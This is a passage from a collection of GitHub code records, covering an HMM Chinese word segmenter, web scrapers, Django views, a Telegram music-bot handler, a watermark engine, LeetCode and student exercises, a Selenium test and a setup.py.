range(len(B)):\n sum = np.sum(len(B[i]))\n for j in range(len(B[i])):\n if B[i][j] == 0:\n B[i][j] = -3.14e+100\n else:\n B[i][j] = np.log(B[i][j] / sum)\n\n # 返回统计得到的三个参数\n return PI, A, B\n\n\ndef participle(artical, PI, A, B):\n \"\"\"\n 分词\n 算法依据“10.4.2 维特比算法”\n :param artical: 要分词的文章\n :param PI: 初始状态概率向量PI\n :param A: 状态转移矩阵\n :param B: 观测概率矩阵\n :return: 分词后的文章\n \"\"\"\n part_artical = []\n for line in artical:\n # 初始化δ,δ存放四种状态的概率值,因为状态链中每个状态都有\n delta = [[0 for i in range(4)] for i in range(len(line))]\n for i in range(4):\n # 初始化δ状态链中第一个状态的四种状态概率\n delta[0][i] = PI[i] + B[i][ord(line[0])]\n # 初始化ψ,初始时为0\n psi = [[0 for i in range(4)] for i in range(len(line))]\n\n for t in range(1, len(line)):\n for i in range(4):\n tmpDelta = [0] * 4\n for j in range(4):\n tmpDelta[j] = delta[t - 1][j] + A[j][i]\n # 找到最大的那个δ * a,\n maxDelta = max(tmpDelta)\n # 记录最大值对应的状态\n maxDeltaIndex = tmpDelta.index(maxDelta)\n\n # 将找到的最大值乘以b放入,\n # 注意:这里同样因为log变成了加法\n delta[t][i] = maxDelta + B[i][ord(line[t])]\n # 在ψ中记录对应的最大状态索引\n psi[t][i] = maxDeltaIndex\n\n # 建立一个状态链列表,开始生成状态链\n sequence = []\n # 算法10.5 第三步:终止\n # 在上面for循环全部结束后,很明显就到了第三步了\n # 获取最后一个状态的最大状态概率对应的索引\n i_opt = delta[len(line) - 1].index(max(delta[len(line) - 1]))\n # 在状态链中添加索引\n # 注:状态链应该是B、M、E、S,这里图方便用了0、1、2、3,其实一样的\n sequence.append(i_opt)\n # 算法10.5 第四步:最优路径回溯\n # 从后往前遍历整条链\n for t in range(len(line) - 1, 0, -1):\n # 不断地从当前时刻t的ψ列表中读取到t-1的最优状态\n i_opt = psi[t][i_opt]\n # 将状态放入列表中\n sequence.append(i_opt)\n # 因为是从后往前将状态放入的列表,所以这里需要翻转一下,变成了从前往后\n sequence.reverse()\n\n # 开始对该行分词\n current_line = ''\n # 遍历该行每一个字\n for i in range(len(line)):\n # 在列表中放入该字\n current_line += line[i]\n # 如果该字是3:S->单个词 或 2:E->结尾词 ,则在该字后面加上分隔符 |\n # 此外如果改行的最后一个字了,也就不需要加 |\n if (sequence[i] == 3 or sequence[i] == 2) and i != (len(line) - 1):\n current_line += '|'\n # 在返回列表中添加分词后的该行\n part_artical.append(current_line)\n # 返回分词后的文章\n return part_artical\n\n\nif __name__ == '__main__':\n start = time.time()\n artical = load_data('test.txt')\n PI, A, B = train('train.txt')\n\n # 打印原文\n print('原文如下:')\n for line in artical:\n print(line)\n\n # 进行分词\n part_artical = participle(artical, PI, A, B)\n\n # 打印结果\n print('分词后:')\n for line in part_artical:\n print(line)\n\n print('消耗时间为:', time.time() - start)\n\n\n","repo_name":"wittonzhou/LiHang-Statistical-Learning","sub_path":"HMM/HMM.py","file_name":"HMM.py","file_ext":"py","file_size_in_byte":9287,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29837764037","text":"import re\n\nfrom fiftystates.scrape.committees import CommitteeScraper, Committee\n\nimport lxml.html\n\n\nclass CACommitteeScraper(CommitteeScraper):\n state = 'ca'\n\n def scrape(self, chamber, term):\n if chamber != 'lower' or term != '20092010':\n return\n\n list_url = 'http://www.assembly.ca.gov/acs/comDir.asp'\n with self.urlopen(list_url) as list_page:\n list_page = lxml.html.fromstring(list_page)\n list_page.make_links_absolute(list_url)\n\n for a in list_page.xpath('//ul/a'):\n comm = Committee('lower', a.text.strip())\n self.scrape_committee_members(comm, a.attrib['href'])\n self.save_committee(comm)\n\n def scrape_committee_members(self, committee, url):\n # break out of frame\n url = url.replace('newcomframeset.asp', 'welcome.asp')\n\n with self.urlopen(url) as page:\n page = lxml.html.fromstring(page)\n\n for a in page.xpath('//tr/td/font/a'):\n if re.match('^(mailto:|javascript:)', a.attrib['href']):\n continue\n\n name = a.xpath('string(ul)').strip()\n name = re.sub('\\s+', ' ', name)\n\n parts = name.split('-', 2)\n if len(parts) > 1:\n name = parts[0].strip()\n mtype = parts[1].strip().lower()\n else:\n mtype = 'member'\n\n committee.add_member(name, mtype)\n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/ca/committees.py","file_name":"committees.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73968072834","text":"import random\nsuits = [\"piki\",\"bubna\", \"chervi\"]\nfaces = [\"dvoika\", \"troyka\", \"chetverka\", \"peterka\", \"shesterka\", \"semerka\", \"vosmerka\",\"devyatka\", \"desyatka\", \"valet\", \"dama\",\"korol\", \"tuz\"]\nkeep_going = True\nwhile keep_going:\n my_face = random.choice(faces)\n my_suit = random.choice(suits)\n your_face = random.choice(faces)\n your_suit = random.choice(suits)\n print(\"У меня\", my_face, \"\", my_suit)\n print(\"У ВАС\", your_face, \"\", your_suit)\n if faces.index(my_face) > faces.index(your_face):\n print(\"Я победил!\")\n elif faces.index(my_face) < faces.index(your_face):\n print(\"ВЫ ПОБЕДИЛИ!\")\n else:\n print(\"У НАС НИЧЬЯ!\")\n answer = input(\"Нажмите [ENTER], ЧТОБЫ ПРОДОЛЖИТЬ,ЛЮБУЮ\")\n keep_going = (answer == \"\")\n","repo_name":"zhanibekov/python-learning","sub_path":"chapter6/HighCard.py","file_name":"HighCard.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4330481950","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.models import User \nfrom app.models import Artista,Tecnica,Obra\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom django.contrib import messages\nfrom .forms import TecnicaForm\n\n# Create your views here.\n\ndef index(request):\n context={}\n return render(request, 'index.html', context)\n\ndef administrador(request):\n context={}\n return render(request, 'administrador.html', context)\n\ndef agregarO(request):\n return render(request, 'agregarO.html')\n\ndef formulario(request):\n context={}\n return render(request, 'formulario.html', context)\n\ndef galeria(request):\n context={}\n return render(request, 'galeria.html', context)\n\ndef obra1(request):\n context={}\n return render(request, 'obra1.html', context)\n\ndef obra2(request):\n context={}\n return render(request, 'obra2.html', context)\n\ndef obra3(request):\n context={}\n return render(request, 'obra3.html', context)\n\ndef obra4(request):\n context={}\n return render(request, 'obra4.html', context)\n\ndef artistas(request):\n context={}\n return render(request, 'artistas.html', context)\n\n\n\n\ndef crear(request):\n if request.method != \"POST\":\n users = User.objects.all()\n context = {\n 'users': users\n }\n return render(request, 'registro.html', context)\n else:\n nombre = request.POST[\"nombre\"]\n apellido = request.POST[\"apellido\"]\n email = request.POST[\"email\"]\n telefono = request.POST[\"telefono\"]\n contraseña = request.POST[\"password\"]\n obj1 = Artista.objects.create(\n nombre=nombre,\n apellido=apellido,\n email=email,\n telefono=telefono,\n contraseña=contraseña,\n )\n obj = User.objects.create_user(\n username=email,\n password=contraseña,\n first_name=nombre,\n last_name=apellido\n )\n obj1.save()\n obj.save()\n \n users = User.objects.all()\n return redirect('login')\n\n \n \n@login_required\ndef menu(request):\n user = request.user\n return render(request, 'menu.html', {'user': user})\n \ndef logout_view(request):\n logout(request)\n return redirect('login')\n\ndef inserta_tecnica(request):\n if request.method == \"POST\":\n form = TecnicaForm(request.POST)\n if form.is_valid():\n form.save()\n form=TecnicaForm()\n msg='Tecnica ingresado correctamente'\n context={\"form\":form,'msg':msg}\n return render(request,'crud/agregarT.html',context)\n else:\n form = TecnicaForm()\n context={\"form\":form}\n return render(request,'crud/agregarT.html',context)\n \ndef crud_tecnica(request):\n\ttecnicas=Tecnica.objects.all()\n\tcontext={\"tecnicas\":tecnicas}\n\treturn render(request,'crud/crudtec.html',context)\n\ndef borra_tecnica(request,pk):\n try:\n tecnica=Tecnica.objects.get(id_tecnica=pk)\n tecnica.delete()\n tecnicas=Tecnica.objects.all()\n context={'tecnicas':tecnicas}\n return render(request,'crud/crudtec.html',context)\n except:\n mensaje='Tecnica no Existe' \n tecnicas=Tecnica.objects.all()\n context={'tecnicas':tecnicas,'mensaje':mensaje}\n return render(request,'crud/crudtec.html',context) \n\ndef modifica_tecnica(request,pk):\n try:\n tecnica=Tecnica.objects.get(id_tecnica=pk) \n if tecnica:\n if request.method == \"POST\":\n form = TecnicaForm(request.POST,instance=tecnica)\n form.save()\n tecnicas=Tecnica.objects.all()\n contexto={'tecnicas':tecnicas} \n return render(request,'crud/crudtec.html',contexto)\n else:\n form = TecnicaForm(instance=tecnica) \n contexto={'form':form,'tecnica':tecnica}\n return render(request,'crud/modifica_tecnica.html',contexto) \n except:\n contexto={'mensaje','Error - Tecnica no existe'}\n return render(request,'crud/crudtec.html',contexto)\n\n\n@login_required\ndef crud(request):\n usuario = request.user\n obras = Obra.objects.filter(artista=request.user.username)\n \n if \"usuario\" not in request.session:\n request.session[\"usuario\"] = request.user.username\n usuario = request.session[\"usuario\"]\n else:\n usuario = request.session[\"usuario\"] \n \n context = {\"usuario\": usuario, \"obras\": obras}\n return render(request, 'crud/crud.html', context)\n\n\ndef inserta_obra(request):\n if request.method != \"POST\":\n tecnicas=Tecnica.objects.all()\n context={\"tecnicas\":tecnicas}\n return render(request,'crud/agregarO.html',context)\n else:\n artista = Artista.objects.get(email=request.user.username)\n tecnicas=Tecnica.objects.all()\n titulo=request.POST[\"titulo\"]\n dimensiones=request.POST[\"dimensiones\"]\n fecha=request.POST[\"fecha\"]\n tecnica=request.POST[\"tecnica\"]\n descripcion=request.POST[\"descripcion\"]\n imagen=request.FILES[\"imagen\"]\n if \"destacada\" in request.POST:\n destacada=1\n else:\n destacada=0\n objTecnica=Tecnica.objects.get(id_tecnica=tecnica)\n obj=Obra.objects.create( titulo=titulo,\n dimensiones=dimensiones,\n fecha=fecha,\n id_tecnica=objTecnica,\n descripcion=descripcion,\n imagen=imagen,\n artista=artista,\n destacada=destacada)\n obj.save() \n context={\"mensaje\":'Obra Ingresada Exitosamente!'}\n return redirect('crud')\n\n\ndef borra_obra(request,pk):\n context={}\n try:\n obra=Obra.objects.get(id_obra=pk)\n obra.delete()\n mensaje='obra Eliminada Exitosamente'\n obras=Obra.objects.all()\n context={'obras':obras,'mensaje':mensaje}\n return render(request,'crud/crud.html',context)\n except:\n mensaje='Obra no Existe' \n obras=Obra.objects.all()\n context={'obras':obras,'mensaje':mensaje}\n return render(request,'crud/crud.html',context) \n\ndef busca_obra(request,pk):\n if pk!='':\n obra=Obra.objects.get(id_obra=pk)\n tecnicas=Tecnica.objects.all()\n context={'obra':obra,'tecnicas':tecnicas}\n if obra:\n return render(request,'crud/modifica_obra.html',context)\n else:\n context={'mensaje','Error - Obra no encontrado'}\n return render(request,'crud/crud.html',context)\n \ndef modifica_obra(request, pk):\n if request.method == \"POST\":\n obra = Obra.objects.get(id_obra=pk)\n artista = Artista.objects.get(email=request.user.username)\n tecnicas = Tecnica.objects.all()\n obra.titulo = request.POST[\"titulo\"]\n obra.dimensiones = request.POST[\"dimensiones\"]\n obra.fecha = request.POST[\"fecha\"]\n obra.descripcion = request.POST[\"descripcion\"]\n obra.id_tecnica = Tecnica.objects.get(id_tecnica=request.POST[\"tecnica\"])\n if \"destacada\" in request.POST:\n obra.destacada=1\n else:\n obra.destacada=0\n\n # Verificar si se proporciona una nueva imagen\n imagen = request.FILES.get(\"imagen\")\n if imagen:\n obra.imagen = imagen\n\n obra.save() # Guardar los cambios en la obra existente\n\n obras = Obra.objects.all()\n context = {\"obras\": obras}\n return render(request, 'crud/crud.html', context)\n\n else:\n # Obtener la obra existente para mostrarla en el formulario\n obra = Obra.objects.get(id_obra=pk)\n tecnicas = Tecnica.objects.all()\n return render(request, 'crud/modifica_obra.html', {\"obra\": obra, \"tecnicas\": tecnicas})\n\n","repo_name":"Eldonndan/Arte","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7986,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35130863586","text":"#output the product of two maticies A*A\n#where A is the transpose of A\n#this is a 5X3 matrix\n#Transpose - cause (two or more things) to change places with each other.\ndef main():\n X = [[1,2,3],\n [4,5,6],\n [7,8,9],\n [10,11,12],\n [13,14,15]]\n\n Y = []\n for i in range(3):\n Y.append([row[i] for row in X])\n\n result =[]\n\n # iterate through rows of X\n for i in range(len(X)):\n # iterate through columns of Y\n for j in range(len(Y[0])):\n # iterate through rows of Y\n for k in range(len(Y)):\n result[i][j] += X[i][k] * Y[k][j]\n\n for r in result:\n print(r)\n\nmain()","repo_name":"brandon-rowe/Python","sub_path":"Exams/Final/matrix.py","file_name":"matrix.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42183777346","text":"from sorl.thumbnail.engines.pgmagick_engine import Engine as MagickEngine\nfrom sorl_watermarker.engines.base import WatermarkEngineBase\nfrom pgmagick import Geometry, Image, CompositeOperator as CoOp\nfrom pgmagick import ChannelType, ImageType, QuantumOperator as QuOp\n\n\nclass Engine(WatermarkEngineBase, MagickEngine):\n \"\"\"\n PGMagick based engine with watermark support.\n \"\"\"\n def _watermark(self, image, watermark_path, opacity, size, position_str):\n watermark = self.get_image(open(watermark_path))\n image_size = self.get_image_size(image)\n layer = Image(Geometry(image_size[0], image_size[1]), 'transparent')\n if opacity < 1:\n self._reduce_opacity(watermark, opacity)\n if not size:\n mark_size = self.get_image_size(watermark)\n else:\n mark_size = self._get_new_watermark_size(size, self.get_image_size(watermark))\n options = {'crop': 'center',\n 'upscale': False}\n watermark = self.scale(watermark, mark_size, options)\n watermark = self.crop(watermark, mark_size, options)\n\n position = self._define_watermark_position(position_str, image_size, mark_size)\n layer.composite(watermark, position[0], position[1], CoOp.OverCompositeOp)\n image.composite(layer, 0, 0, CoOp.OverCompositeOp)\n return image\n\n\n def _reduce_opacity(self, watermark, opacity):\n \"\"\"\n Returns an image with reduced opacity. Converts image to RGBA if needs.\n\n Simple watermark.opacity(65535 - int(65535 * opacity) would not work for\n images with the Opacity channel (RGBA images). So we have to convert RGB or any\n other type to RGBA in this case\n \"\"\"\n\n if watermark.type() != ImageType.TrueColorMatteType:\n watermark.type(ImageType.TrueColorMatteType)\n depth = 255 - int(255 * opacity)\n watermark.quantumOperator(ChannelType.OpacityChannel,QuOp.MaxQuantumOp, depth)\n","repo_name":"vaad2/flowershop","sub_path":"sorl_watermarker/engines/pgmagick_engine.py","file_name":"pgmagick_engine.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16105693396","text":"import asyncio\nfrom os import path\n\nfrom pyrogram import filters\nfrom pyrogram.types import Message, InlineKeyboardMarkup, Voice\nfrom youtube_search import YoutubeSearch\n\nfrom FallenMusic import (BOT_USERNAME, DURATION_LIMIT_SEC, DURATION_LIMIT,\n BOT_NAME, app, db_mem)\nfrom FallenMusic.Helpers.Url import get_url\nfrom FallenMusic.Cache.checker import checker\nfrom FallenMusic.Cache.assistant import AssistantAdd\nfrom FallenMusic.Cache.permission import PermissionCheck\nfrom FallenMusic.Helpers.Thumbnails import thumb_init\nfrom FallenMusic.Helpers.PyTgCalls.Converter import convert\nfrom FallenMusic.Helpers.PyTgCalls.Downloader import download\nfrom FallenMusic.Helpers.Database import add_served_user, add_served_chat\nfrom FallenMusic.Helpers.Changers import seconds_to_min, time_to_seconds\nfrom FallenMusic.Helpers.Stream import start_stream, start_stream_audio\nfrom FallenMusic.Helpers.Ytinfo import (get_yt_info_id, get_yt_info_query, get_yt_info_query_slider)\n\n\nloop = asyncio.get_event_loop()\n\n\n@app.on_message(\n filters.command([\"play\", f\"play@{BOT_USERNAME}\"]) & filters.group\n)\n@checker\n@PermissionCheck\n@AssistantAdd\nasync def play(_, message: Message):\n try:\n await message.delete()\n except:\n pass\n await add_served_chat(message.chat.id)\n if message.chat.id not in db_mem:\n db_mem[message.chat.id] = {}\n if message.sender_chat:\n return await message.reply_text(\n \"**» ʏᴏᴜ'ʀᴇ ᴀɴ ᴀɴᴏɴʏᴍᴏᴜs ᴀᴅᴍɪɴ.\\n\\nʀᴇᴠᴇʀᴛ ʙᴀᴄᴋ ᴛᴏ ᴜsᴇʀ ᴀᴄᴄᴏᴜɴᴛ ғᴏʀ ᴜsɪɴɢ ᴍᴇ.**\"\n )\n audio = (\n (message.reply_to_message.audio or message.reply_to_message.voice)\n if message.reply_to_message\n else None\n )\n url = get_url(message)\n if audio:\n mystic = await message.reply_text(\n \"**↻ ᴩʀᴏᴇssɪɴɢ...\\n\\nᴩʟᴇᴀsᴇ ᴡᴀɪᴛ...**\"\n )\n\n if audio.file_size > 314572800:\n return await mystic.edit_text(\n \"**» ᴀᴜᴅɪᴏ ғɪʟᴇ sɪᴢᴇ sʜᴏᴜʟᴅ ʙᴇ ʟᴇss ᴛʜᴀɴ 300ᴍʙ.**\"\n )\n duration_min = seconds_to_min(audio.duration)\n duration_sec = audio.duration\n if (audio.duration) > DURATION_LIMIT_SEC:\n return await mystic.edit_text(\n f\"**» {BOT_NAME} ᴅᴏᴇsɴ'ᴛ ᴀʟʟᴏᴡ ᴛᴏ ᴩʟᴀʏ ᴛʀᴀᴄᴋs ʟᴏɴɢᴇʀ ᴛʜᴀɴ {DURATION_LIMIT_MIN} ᴍɪɴᴜᴛᴇs.**\"\n )\n file_name = (\n audio.file_unique_id\n + \".\"\n + (\n (audio.file_name.split(\".\")[-1])\n if (not isinstance(audio, Voice))\n else \"ogg\"\n )\n )\n file_name = path.join(path.realpath(\"downloads\"), file_name)\n file = await convert(\n (await message.reply_to_message.download(file_name))\n if (not path.isfile(file_name))\n else file_name,\n )\n return await start_stream_audio(\n message,\n file,\n \"smex1\",\n \"Given Audio Via Telegram\",\n duration_min,\n duration_sec,\n mystic,\n )\n elif url:\n mystic = await message.reply_text(\"**↻ sᴇᴀʀᴄʜɪɴɢ...\\n\\nᴩʟᴇᴀsᴇ ᴡᴀɪᴛ...**\")\n if not message.reply_to_message:\n query = message.text.split(None, 1)[1]\n else:\n query = message.reply_to_message.text\n (\n title,\n duration_min,\n duration_sec,\n thumb,\n videoid,\n ) = get_yt_info_query(query)\n title, duration_min, duration_sec, thumbnail = get_yt_info_id(videoid)\n if duration_sec > DURATION_LIMIT_SEC:\n return await message.reply_text(\n f\"**» {BOT_NAME} ᴅᴏᴇsɴ'ᴛ ᴀʟʟᴏᴡ ᴛᴏ ᴩʟᴀʏ ᴛʀᴀᴄᴋs ʟᴏɴɢᴇʀ ᴛʜᴀɴ {DURATION_LIMIT_MIN} ᴍɪɴᴜᴛᴇs.**\"\n )\n downloaded_file = await loop.run_in_executor(\n None, download, videoid, mystic, title\n )\n raw_path = await convert(downloaded_file)\n thumb = await thumb_init(videoid)\n await mystic.delete()\n else:\n if len(message.command) < 2:\n await message.reply_photo(\n photo=\"FallenMusic/Utilities/play.jpg\",\n caption=(\n \"**➻ ᴛʜɪs ɪs ɴᴏᴛ ᴛʜᴇ ᴄᴏʀʀᴇᴄᴛ ғᴏʀᴍᴀᴛ ᴛᴏ ᴩʟᴀʏ.**\\n\\n**ᴇxᴀᴍᴩʟᴇ :** /play [sᴏɴɢ ɴᴀᴍᴇ ᴏʀ ʏᴏᴜᴛᴜʙᴇ ʟɪɴᴋ ᴏʀ ʀᴇᴩʟʏ ᴛᴏ ᴀ ᴀᴜᴅɪᴏ]\"\n ),\n )\n return\n mystic = await message.reply_text(\"**↻ sᴇᴀʀᴄʜɪɴɢ...\\n\\nᴩʟᴇᴀsᴇ ᴡᴀɪᴛ...**\")\n query = message.text.split(None, 1)[1]\n (\n title,\n duration_min,\n duration_sec,\n thumb,\n videoid,\n ) = get_yt_info_query(query)\n await mystic.delete()\n title, duration_min, duration_sec, thumbnail = get_yt_info_id(videoid)\n if duration_sec > DURATION_LIMIT_SEC:\n return await message.reply_text(\n f\"**» {BOT_NAME} ᴅᴏᴇsɴ'ᴛ ᴀʟʟᴏᴡ ᴛᴏ ᴩʟᴀʏ ᴛʀᴀᴄᴋs ʟᴏɴɢᴇʀ ᴛʜᴀɴ {DURATION_LIMIT} ᴍɪɴᴜᴛᴇs.**\"\n )\n mystic = await message.reply_text(\n f\"**{BOT_NAME} ᴅᴏᴡɴʟᴏᴀᴅᴇʀ**\\n\\n**ᴛɪᴛʟᴇ :** {title}\\n\\n0% ■■■■■■■■ 100%\"\n )\n downloaded_file = await loop.run_in_executor(\n None, download, videoid, mystic, title\n )\n chat_id = message.chat.id\n user_id = message.from_user.id\n raw_path = await convert(downloaded_file)\n thumb = await thumb_init(videoid)\n if chat_id not in db_mem:\n db_mem[chat_id] = {}\n await start_stream(\n message,\n raw_path,\n videoid,\n thumb,\n title,\n duration_min,\n duration_sec,\n mystic,\n )\n","repo_name":"Devarora-0981/SpideyMusic","sub_path":"FallenMusic/Modules/Play.py","file_name":"Play.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"} +{"seq_id":"72565739074","text":"'''\n\nDescription:\n\nGiven an array of integers nums and a positive integer k, find whether it's possible to divide this array into sets of k consecutive numbers\nReturn True if its possible otherwise return False.\n\n \n\nExample 1:\n\nInput: nums = [1,2,3,3,4,4,5,6], k = 4\nOutput: true\nExplanation: Array can be divided into [1,2,3,4] and [3,4,5,6].\nExample 2:\n\nInput: nums = [3,2,1,2,3,4,3,4,5,9,10,11], k = 3\nOutput: true\nExplanation: Array can be divided into [1,2,3] , [2,3,4] , [3,4,5] and [9,10,11].\nExample 3:\n\nInput: nums = [3,3,2,2,1,1], k = 3\nOutput: true\nExample 4:\n\nInput: nums = [1,2,3,4], k = 3\nOutput: false\nExplanation: Each array should be divided in subarrays of size 3.\n \n\nConstraints:\n\n1 <= nums.length <= 10^5\n1 <= nums[i] <= 10^9\n1 <= k <= nums.length\n\n'''\n\n\n\nfrom collections import Counter\nfrom typing import List\nclass Solution:\n def isPossibleDivide(self, nums: List[int], k: int) -> bool:\n \n if len(nums)%k != 0:\n # Quick response:\n # Reject because it is impossible to make sets\n return False\n \n if k == 1:\n # Quick response:\n # Accept with trivial solution by making set with each single element itself\n return True\n \n \n # Make number sorted in ascending order\n nums.sort()\n \n # dictionary:\n # key : number\n # value : occurrence\n num_occ_dict = Counter( nums )\n \n \n # Make consecutive sets of size k from the smallest element\n for n in nums:\n \n occ_for_partition = num_occ_dict[n]\n \n if occ_for_partition == 0:\n continue\n \n \n for i in range(k):\n \n if num_occ_dict[n+i] < occ_for_partition:\n # Reject:\n # Either number (n+i) doesn't exist, or\n # occurrence of (n+i) is not enough to make consecutive sets with k\n return False\n \n # after making sets, update occurrence\n num_occ_dict[n+i] -= occ_for_partition\n \n return True\n\n\n\n# n : the number of elements in nums\n# k : the number of unique elements in nums\n\n## Time Complexity: O( n )\n#\n# The overhead in time is the cost of Timsort, which is of O( n log n).\n\n\n## Space Complexity: O( k )\n#\n# The overhead in space is the storage for dictionary, num_occ_dict, which is of O( k ).\n\n\n\ndef test_bench():\n\n test_data = [\n ( [1,2,3,3,4,4,5,6], 4),\n ( [3,2,1,2,3,4,3,4,5,9,10,11], 3),\n ( [3,3,2,2,1,1], 3),\n ( [1,2,3,4],3)\n ]\n\n for sequence, k in test_data:\n\n print( Solution().isPossibleDivide(sequence, k) )\n \n return \n\n\n\nif __name__ == '__main__':\n\n test_bench()","repo_name":"brianchiang-tw/leetcode","sub_path":"No_1296_Divide Array in Sets of K Consecutive Numbers/divide_array_in_sets_of_k_consecutive_numbers_by_dict_and_sort.py","file_name":"divide_array_in_sets_of_k_consecutive_numbers_by_dict_and_sort.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"61"} +{"seq_id":"71942107073","text":"from django.contrib.auth import get_user_model\nfrom django.shortcuts import render\nfrom django.views.generic import View\nfrom django.http import JsonResponse, HttpResponse\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nimport pandas as pd\n\n#json formatting\nimport json\n\nimport csv\n\n#File Paths\nfrom settings import BASE_DIR\n\n#GLOBALS\npokemon_csv = BASE_DIR + '/pokemon-sun-and-moon-gen-7-stats/pokemon.csv'\nmoves_csv = BASE_DIR + '/pokemon-sun-and-moon-gen-7-stats/moves.csv'\n\n#HomeView contains ajax api calls to TableData and PokemonChartData etc.\nclass HomeView(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'charts.html')\n\nclass MovesView(View):\n def get(self, request, *args, **kwargs):\n return render(request, 'moves.html')\n\nclass TableData(APIView):\n\n authentication_classes = []\n permission_classes = []\n\n def get(self, request, format=None):\n df = pd.read_csv(pokemon_csv, header=None).fillna('N/A').values.tolist()\n\n header = list(map(lambda col: {'title': col}, df[0]))\n pokemon = json.dumps(df[1:])\n\n data = {\n \"data\": pokemon,\n \"columns\": header\n }\n\n return Response(data)\n\nclass PokemonChartData(APIView):\n #structure and format data for charts.js to display, aggregate, group etc.\n\n def get(self, request, format=None):\n df2 = pd.read_csv(pokemon_csv)\n\n type_counts = df2['type1'].value_counts().tolist()\n types = df2['type1'].value_counts().index.tolist()\n\n type2_counts = df2['type2'].value_counts().tolist()\n types2 = df2['type2'].value_counts().index.tolist()\n\n data = {\n \"types\": types,\n \"type_counts\": type_counts,\n \"types2\": types2,\n \"type2_counts\": type2_counts\n }\n\n return Response(data)\n\n\nclass PokemonMovesChartData(APIView):\n\n\n def get(self, request, format=None):\n\n result = {}\n with open(moves_csv, 'rb') as moves:\n csvreader = csv.reader(moves, delimiter=',')\n next(csvreader, None)\n for row in csvreader:\n if row[3] in result:\n if row[4] in result[row[3]]:\n result[row[3]][row[4]] += 1\n\n else:\n result[row[3]][row[4]] = 1\n else:\n result[row[3]] = {}\n result[row[3]][row[4]] = 1\n\n types = result.keys()\n status = [result[x]['Status'] for x in result]\n special = [result[x]['Special'] for x in result]\n physical = [result[x]['Physical'] for x in result]\n\n data = {\n 'types': types,\n 'special': special,\n 'status': status,\n 'physical': physical\n\n }\n\n return Response(data)\n\n\n\n","repo_name":"Diongarman/Web","sub_path":"Django/Django-Chart.js-9deb1d489250aca706b9939ae0bad331d0709982/src/charts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17620749813","text":"import unittest\n\nfrom util.selTestUtils import *\n\nfrom SelTestBase import SelTestBase\n\ndynamicdev = 'gate2.zenoss.loc'\n\nclass TestModelWindowsDevice(SelTestBase):\n \"\"\"Defines an object that runs tests for modeling the win2k-test2 device\"\"\"\n\n def _setWindowszProperties(self):\n sel = self.selenium\n sel.click(\"link=Devices\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=Server\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=Windows\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=zProperties\")\n sel.wait_for_page_to_load(\"30000\")\n sel.type(\"zWinUser:string\", \"zenoss-test\")\n sel.type(\"zWinPassword:string\", \"zenoss\")\n sel.click(\"saveZenProperties:method\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"link=Windows\")\n sel.wait_for_page_to_load(\"30000\")\n \n def testModelWin2kTest(self):\n \"\"\"Tests Modeling win2k-test2\"\"\"\n sel = self.selenium\n self._setWindowszProperties()\n self.addDeviceModelWindows('win2k-test2.zenoss.loc')\n sel.click(\"link=OS\")\n sel.wait_for_page_to_load(\"30000\")\n sel.click(\"document.ipServiceListForm.onlyMonitored\")\n sel.wait_for_page_to_load(\"30000\")\n self.failUnless(sel.is_element_present(\"link=epmap\"))\n self.failUnless(sel.is_element_present(\"link=netbios-ns\"))\n self.failUnless(sel.is_element_present(\"link=netbios-dgm\"))\n self.failUnless(sel.is_element_present(\"link=netbios-ssn\"))\n self.failUnless(sel.is_element_present(\"link=snmp\"))\n self.failUnless(sel.is_element_present(\"link=microsoft-ds\"))\n self.failUnless(sel.is_element_present(\"link=isakmp\"))\n self.failUnless(sel.is_text_present(\"1 of 9\"))\n self.deleteDevice('win2k-test.zenoss.loc')\n \n \n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"zenoss/zenoss-prodbin","sub_path":"Products/ZenUITests/tests/selenium/TestModelWindowsCore.py","file_name":"TestModelWindowsCore.py","file_ext":"py","file_size_in_byte":1900,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"17198064669","text":"import os\nfrom io import open\nimport subprocess\nfrom setuptools import setup, find_packages\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(HERE, 'README.md'), encoding='utf-8') as f:\n LONG_DESCRIPTION = f.read()\n\nwith open(os.path.join(HERE, 'requirements.txt'), encoding='utf-8') as f:\n INSTALL_REQUIRES = f.read().split('\\n')\n\nPACKAGE_VERSION = subprocess.check_output('git describe --tags', shell=True).decode('ascii').strip()\n\nsha = 'Unknown'\ntry:\n sha = subprocess.check_output(['git', 'rev-parse', 'HEAD'], cwd=HERE).decode('ascii').strip()\nexcept Exception:\n pass\n\nPACKAGE_VERSION_LOCAL = PACKAGE_VERSION + '+' + sha[:7]\n\nsetup(\n name='easyproxy',\n version=PACKAGE_VERSION,\n author='xiangyuejia',\n author_email='xiangyuejia@qq.com',\n description='An easy way to get high-hidden proxy 